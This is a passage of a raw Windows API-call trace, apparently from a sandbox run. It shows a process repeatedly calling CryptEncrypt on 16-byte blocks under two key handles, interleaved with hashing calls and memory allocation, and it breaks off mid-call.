[0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.498] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.499] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.499] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.499] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.499] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.499] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.499] free (_Block=0x0) [0157.499] free (_Block=0x3def010) [0157.499] malloc (_Size=0x1fd) returned 0x3def010 [0157.499] free (_Block=0x0) [0157.499] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.499] CryptHashData (hHash=0x432e78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.499] malloc (_Size=0x14) returned 0x3f65440 [0157.499] free (_Block=0x0) [0157.499] CryptGetHashParam (in: hHash=0x432e78, dwParam=0x2, pbData=0x3f65440, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65440, pdwDataLen=0x339faec) returned 1 [0157.499] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.499] free (_Block=0x3f65440) [0157.500] CryptDestroyHash (hHash=0x432e78) returned 1 [0157.500] free (_Block=0x3def010) [0157.500] free (_Block=0x606108) [0157.500] malloc (_Size=0x1fd) returned 0x606108 [0157.500] free (_Block=0x0) [0157.500] malloc (_Size=0x1f2) returned 0x3def010 [0157.500] free (_Block=0x0) [0157.500] malloc (_Size=0x1f2) returned 0x3def210 [0157.500] free (_Block=0x0) [0157.500] free (_Block=0x0) [0157.500] free (_Block=0x3def010) [0157.501] free (_Block=0x3def210) [0157.501] free (_Block=0x606108) [0157.501] free (_Block=0x3d81e60) [0157.501] malloc (_Size=0x1fd) returned 0x606108 [0157.501] free (_Block=0x0) [0157.501] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.501] free (_Block=0x0) [0157.501] free (_Block=0x0) [0157.501] free (_Block=0x606108) [0157.501] malloc (_Size=0x1fd) returned 0x606108 [0157.501] free (_Block=0x0) [0157.501] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.501] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.501] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.501] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.502] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.503] malloc (_Size=0x1fd) returned 0x3def010 [0157.503] free (_Block=0x0) [0157.504] free (_Block=0x3d81e60) [0157.504] free (_Block=0x606108) [0157.504] malloc (_Size=0x1fd) returned 0x606108 [0157.504] free (_Block=0x0) [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.504] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.505] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.506] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.506] free (_Block=0x0) [0157.506] free (_Block=0x3def010) [0157.506] malloc (_Size=0x1fd) returned 0x3def010 [0157.507] free (_Block=0x0) [0157.507] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.507] CryptHashData (hHash=0x432d78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.507] malloc (_Size=0x14) returned 0x3f652c0 [0157.507] free (_Block=0x0) [0157.507] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339faec) returned 1 [0157.507] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.507] free (_Block=0x3f652c0) [0157.507] CryptDestroyHash (hHash=0x432d78) returned 1 [0157.507] free (_Block=0x3def010) [0157.507] free (_Block=0x606108) [0157.507] malloc (_Size=0x1fd) returned 0x606108 [0157.507] free (_Block=0x0) [0157.507] malloc (_Size=0x1f2) returned 0x3def010 [0157.508] free (_Block=0x0) [0157.508] malloc (_Size=0x1f2) returned 0x3def210 [0157.508] free (_Block=0x0) [0157.508] free (_Block=0x0) [0157.508] free (_Block=0x3def010) [0157.508] malloc (_Size=0x1004) returned 0x3f69ce0 [0157.508] free (_Block=0x3def410) [0157.509] free (_Block=0x3def210) [0157.509] free (_Block=0x606108) [0157.509] free (_Block=0x3d81e60) [0157.509] malloc (_Size=0x1fd) returned 0x606108 [0157.509] free (_Block=0x0) [0157.509] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.509] free (_Block=0x0) [0157.509] free (_Block=0x0) [0157.509] free (_Block=0x606108) [0157.509] malloc (_Size=0x1fd) returned 0x606108 [0157.509] free (_Block=0x0) [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, 